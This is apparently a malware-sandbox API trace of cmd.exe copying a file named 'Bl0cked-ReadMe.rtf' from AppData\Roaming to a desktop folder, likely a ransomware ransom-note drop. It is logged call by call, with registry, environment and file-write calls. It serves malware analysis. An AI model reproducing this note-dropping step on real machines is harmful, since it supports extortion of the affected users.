RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.538] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x0, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegCloseKey (hKey=0x40) returned 0x0 [0225.539] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee744 | out: phkResult=0x2ee744*=0x40) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x40, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x1, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x0, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x9, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x4, lpData=0x2ee750*=0x9, lpcbData=0x2ee748*=0x4) returned 0x0 [0225.539] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee74c, lpData=0x2ee750, lpcbData=0x2ee748*=0x1000 | out: lpType=0x2ee74c*=0x0, lpData=0x2ee750*=0x9, lpcbData=0x2ee748*=0x1000) returned 0x2 [0225.539] RegCloseKey (hKey=0x40) returned 0x0 [0225.539] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.539] srand (_Seed=0x5b8863b9) [0225.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0225.539] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" [0225.540] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.540] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.540] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.540] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.540] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.540] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.540] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.540] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.540] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.540] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.540] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.540] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.540] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.540] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.541] GetEnvironmentStringsW () returned 0x3e22c8* [0225.541] FreeEnvironmentStringsW (penv=0x3e22c8) returned 1 [0225.541] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.541] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.541] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.541] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.541] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.541] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.541] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.541] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.541] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.541] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.541] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef510 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.541] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef510, lpFilePart=0x2ef50c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef50c*="Desktop") returned 0x18 [0225.541] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.541] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef28c | out: lpFindFileData=0x2ef28c) returned 0x3e0008 [0225.542] FindClose (in: hFindFile=0x3e0008 | out: hFindFile=0x3e0008) returned 1 [0225.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef28c | out: lpFindFileData=0x2ef28c) returned 0x3e0008 [0225.542] FindClose (in: hFindFile=0x3e0008 | out: hFindFile=0x3e0008) returned 1 [0225.542] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef28c | out: lpFindFileData=0x2ef28c) returned 0x3e0008 [0225.542] FindClose (in: hFindFile=0x3e0008 | out: hFindFile=0x3e0008) returned 1 [0225.542] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.542] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.542] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.542] GetEnvironmentStringsW () returned 0x3e2ae8* [0225.543] FreeEnvironmentStringsW (penv=0x3e2ae8) returned 1 [0225.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.543] GetConsoleOutputCP () returned 0x1b5 [0225.647] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.647] GetUserDefaultLCID () returned 0x409 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef650, cchData=128 | out: lpLCData="0") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef650, cchData=128 | out: lpLCData="0") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef650, cchData=128 | out: lpLCData="1") returned 2 [0225.647] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.648] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.648] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.649] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.649] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.649] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.649] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.649] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.650] _wcsicmp (_String1="type", _String2=")") returned 75 [0225.650] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0225.650] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0225.650] _wcsicmp (_String1="IF", _String2="type") returned -11 [0225.650] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0225.650] _wcsicmp (_String1="REM", _String2="type") returned -2 [0225.650] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0225.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.655] GetFileType (hFile=0x7) returned 0x2 [0225.655] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.655] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef548 | out: lpMode=0x2ef548) returned 1 [0225.655] _dup (_FileHandle=1) returned 3 [0225.655] _close (_FileHandle=1) returned 0 [0225.656] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0225.656] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef518, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0225.657] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0225.657] GetConsoleTitleW (in: lpConsoleTitle=0x2ef348, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.657] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0225.657] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0225.657] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0225.657] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0225.658] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.658] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2eeeac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeeac) returned 0x3d0e60 [0225.659] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0225.659] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0225.659] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0225.659] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2eddb8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0225.659] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] GetFileType (hFile=0x54) returned 0x1 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ede10 | out: lpFileSizeHigh=0x2ede10*=0x0) returned 0x1632 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.659] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.659] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.659] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.659] GetFileType (hFile=0x4c) returned 0x1 [0225.659] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.659] GetFileType (hFile=0x4c) returned 0x1 [0225.660] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.660] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.661] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.661] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.662] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.662] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] GetFileType (hFile=0x4c) returned 0x1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.662] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.662] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.663] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.663] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] GetFileType (hFile=0x4c) returned 0x1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.663] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.663] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] GetFileType (hFile=0x4c) returned 0x1 [0225.664] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.664] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.664] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.664] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.665] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 